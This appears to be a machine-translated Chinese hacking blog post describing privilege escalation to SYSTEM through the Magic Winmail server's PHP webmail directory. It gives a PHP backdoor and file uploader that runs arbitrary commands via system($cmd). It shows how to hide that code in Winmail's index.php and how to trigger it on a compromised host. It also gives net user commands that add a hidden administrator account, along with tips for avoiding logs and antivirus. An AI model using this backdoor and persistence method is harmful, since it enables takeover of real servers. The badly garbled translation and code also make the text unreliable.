Use Magic Winmail to improve permissions

xiaoxiao2021-03-06 45

Magic Winmail is a very good Mail Server software that is favored by many websites. Mainly some of the small websites. However, in the nearest penetration of the author, it is very dangerous to improve the software through this software, if it is invaded to get WebShell, it is very dangerous.

The server with Magic Winmail will open the 8080 port on the system and provide an email service. People who have used it should know. This Magic Winmail server supports PHP script resolution.

figure 1

There is a folder with Magic Winmail.

A Server's folder with a Webmail folder.

figure 2

You can find that this folder is a file of some PHP scripts. Because Magic Winmail can resolve the PHP script, it is really our use of this vulnerability to improve the rights helper. I found this method is accidentally, I want to install a back door on this server, how to install it? Because I think it is quirky. Generally do not use conventional methods, hitting this server 8080 port. This Magic Winmail is the best place. You place a PHP script in D: / Magicw ~ 1 / Server / Webmail [IPA in the machine I test, whether it is a script injection or a normal PHP script, just put! And Lis0 prompt, please feel free to bold Use, don't there be a log? The rookie is. The general system is invaded, and the administrator to the system is also the MD5 check and the script Trojan. He didn't think of our script. Under this folder, LIS0 recommends using an injected script or a script that does not be written by anti-virus software. Which script does me? LIS0 uses an UP.php written by Angel and inserts something. When playing, upload a script or other stuff in your own modified, it is convenient. What about logs? Of course, there is still. But in the Magic Winmail folder, it is really not much to view the log in this folder so far, unless you read this article :)

Up.php CODZ

IF ($ ID == "1") {

System ($ cmd);

Show_source ($ file);

Copy ($ A, $ B); Unlink ($ A);

}

$ fname = $ _files ['myfile'] ['Name'];

$ do = Copy ($ _ files ['myfile'] ['tmp_name'], $ fname);

IF ($ DO)

{

ECHO "Upload success

echo "

Http: // "; $ server_name." ".Dirname ($ PHP_SELF)." / "."

} else {

ECHO "Upload Fail";

}

" Method = "POST">

In fact, we can insert the following code into the "Magic Winmail's index.php file, its function has been constructed. Plus a vulnerability found by Lis0. This is an perfect back door.

IF ($ ID == "1") {

System ($ cmd);

Show_source ($ file);

Copy ($ A, $ B); Unlink ($ A);

}

We use

http://www.target.com:8080/index.php?id=1&yy=xx can be greatly glanced to visit our broiler. It seems to do it too dark :)

Haven't said a vulnerability? More nonsense. Place a PHP's script under D: / Magicw ~ 1 / Server / Webmail

image 3

Then Zhengda Brightly Net User Lis0 Lis0 / Add & Net Localgroup Administrators Lis0 / Add This is the vulnerability discovered by the buddy, does not believe, let the broiler to prove that I am correct.

Figure 4

This WebShell is the system level rather than your Guest level. Although the Webshell treatment is different. As for if you want to play another Dongdong, use the UP.php upload I mentioned above. It should not be a problem. Then execute it in the lovely small frame box of the script.

Can you improve limit rights if you use an ASP script? It is also placed under the Magic Winmail file.

We can analyze if Magic Winmail can analyze the PHP and ASP scripts at the same time, it should be possible. Sorry MAGIC WINMAIL is not an Asp script, and Magic Winmail is the world of PHP.

We simply analyze how this vulnerability is generated? Our lovely network management is definitely installed with the SYSTEM level when loading Magic Winmail. Of course, Magic Winmail inherits the SYSTEM level, and our Magic Winmail can parse the php script, and you want to have a cute PHP script that is the SYSTEM level script. This Magic Winmail software is a bit like the taste of domestic NetBox.

See what we analyze is right, so I uploaded a PHP probe and see what it was going.

Figure 5

I saw it ~ 乖

SYSTEM Level & Other Functions & Allow / Maximum 32M & Lis0 Happy ING. I personally think this is a place where the most perfect PHP script is placed, and you will play your PHP talents. Ok, it's so much, I hope to help everyone.

Workaround: Use the possible processing of the Magic Winmail to limit the user access to Guest limit.

Disclaimer: Since this method is a big surprise for many people, it may bring adverse effects. The script of the test has been completely deleted. Could do not enhance your temple.

转载请注明原文地址:https://www.9cbs.com/read-58086.html

9cbs

New Post(0)